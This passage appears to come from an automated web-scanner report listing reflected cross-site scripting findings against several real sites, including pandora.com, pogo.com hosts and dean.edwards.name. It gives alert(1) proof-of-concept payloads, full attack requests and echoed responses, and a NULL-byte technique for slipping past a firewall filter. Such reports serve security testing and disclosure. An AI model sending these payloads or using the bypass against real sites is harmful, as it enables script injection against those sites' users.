GET /pandora/jquery.dimension Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.dimension ...[SNIP]... |
3.453. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/jquery.js |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea349<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea349<script>alert(1)< ...[SNIP]... |
3.454. http://blog.pandora.com/pandora/jquery.js [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/jquery.js |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.js9ffb3<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)< ...[SNIP]... |
3.455. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/menuManager.js |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa52fa<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa52fa<script>alert(1)< ...[SNIP]... |
3.456. http://blog.pandora.com/pandora/menuManager.js [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/menuManager.js |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/menuManager.jsfdcd4<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)< ...[SNIP]... |
3.457. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/styles-site.css |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2a34c<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2a34c<script>alert(1)< ...[SNIP]... |
3.458. http://blog.pandora.com/pandora/styles-site.css [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/styles-site.css |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/styles-site.css5dd40<script>alert(1)< Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)< ...[SNIP]... |
3.459. http://blog.pandora.com/press [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /press |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /press711ea<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /press711ea<script>alert(1)< ...[SNIP]... |
3.460. http://blog.pandora.com/show [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /show |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show98567<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show98567<script>alert(1)< ...[SNIP]... |
3.461. http://blog.pandora.com/show/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /show/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show33cf5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show33cf5<script>alert(1)< ...[SNIP]... |
3.462. http://board-games.pogo.com/games/monopoly [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/monopoly |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade82"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/monopoly?ade82"><script>alert(1)< Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=141F4673406 Content-Language: en-US Set-Cookie: com.pogo.unid=660663 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:20 GMT Server: Apache-Coyote/1.1 Content-Length: 60921 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://board-games ...[SNIP]... |
3.463. http://board-games.pogo.com/games/online-chess [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/online-chess |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cb8"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/online-chess?95cb8"><script>alert(1)< Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=B465324E474 Content-Language: en-US Set-Cookie: com.pogo.unid=660644 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache-Coyote/1.1 Content-Length: 55086 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://board-games ...[SNIP]... |
3.464. http://board-games.pogo.com/games/risk [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://board-games.pogo |
Path: | /games/risk |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d31f"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/risk?6d31f"><script>alert(1)< Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=67C6D64D20A Content-Language: en-US Set-Cookie: com.pogo.unid=660652 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:19 GMT Server: Apache-Coyote/1.1 Content-Length: 58205 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://board-games ...[SNIP]... |
3.465. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ifl parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345c3"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: eyeblaster=BWVal=&BWDate= Set-Cookie: A2=gn3Ka4Ke09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=cbce66d2-55a3-4095 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=cbce66d2-55a3-4095-8c7c P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:02:28 GMT Connection: close Content-Length: 1757 var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... =30;ebO.au="Site-8299 ...[SNIP]... |
3.466. http://card-games.pogo.com/games/rainy-day-spider-solitaire [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://card-games.pogo |
Path: | /games/rainy-day-spider |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91aec"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/rainy-day-spider Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response (redirected)
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=6E4CADF2B71 Content-Language: en-US Set-Cookie: com.pogo.unid=660659 Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:06:42 GMT Server: Apache-Coyote/1.1 Content-Length: 60510 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://card-games ...[SNIP]... |
3.467. http://click.linksynergy.com/fs-bin/stat [offerid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://click.linksynergy |
Path: | /fs-bin/stat |
Issue detail
The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload b8b5e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fs-bin/stat?id Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Length: 263 Date: Sun, 09 Jan 2011 02:07:11 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR Bad number format in offerid: For input string: "78941b8b5e<script>alert(1)< </body> ...[SNIP]... |
3.468. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00cf310<a>f30753d02ee was submitted in the REST URL parameter 1. This input was echoed as cf310<a>f30753d02ee in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /weblog%00cf310<a>f30753d02ee/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:39 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a>f30753d02ee/">weblog ...[SNIP]... |
3.469. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5c8b"><script>alert(1This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /weblog%00b5c8b"><script>alert(1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:37 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a href="/weblog%00b5c8b"><script>alert(1)< ...[SNIP]... |
3.470. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61c9d<a>82844ccdc7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again61c9d<a>82844ccdc7b/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:11:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Expires: Sun, 09 Jan 2011 02:11:27 GMT Last-Modified: Sun, 09 Jan 2011 02:11:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head> <title>dean.edwards.name <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedwards ...[SNIP]... </a>/again61c9d<a>82844ccdc7b/</h1> ...[SNIP]... |
3.471. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://dean.edwards.name |
Path: | /weblog/2006/06/again/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff341"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?ff341"><script>alert(1)< Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:08:55 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Link: <http://dean.edwards.name Expires: Sun, 09 Jan 2011 02:08:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 213691 <!doctype html> <html> <head> <title>Dean Edwards: window.onload (again)</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://d ...[SNIP]... <form class="contact" action="/weblog/2006/06 ...[SNIP]... |
3.472. http://download-games.pogo.com/ [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | / |
Issue detail
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ef4"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.Request
GET /?site=pogo&refid=19ef4"%3balert(1)/ Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134282 Cache-Control: private, max-age=14348 Date: Sun, 09 Jan 2011 02:09:39 GMT Connection: close <HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="19ef4";alert(1)/ var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]... |
3.473. http://download-games.pogo.com/ [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://download-games |
Path: | / |
Issue detail
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4a51"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /?site=pogo&refid Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 138764 Cache-Control: private, max-age=14372 Date: Sun, 09 Jan 2011 02:09:06 GMT Connection: close <HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374 <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... omePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="headernav_fp var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd"; /* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]... |
3.474. http://download-games.pogo.com/ [refid parameter] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://download-games |
Path: | / |
Issue detail
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b7aed"%20a%3dbThis behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
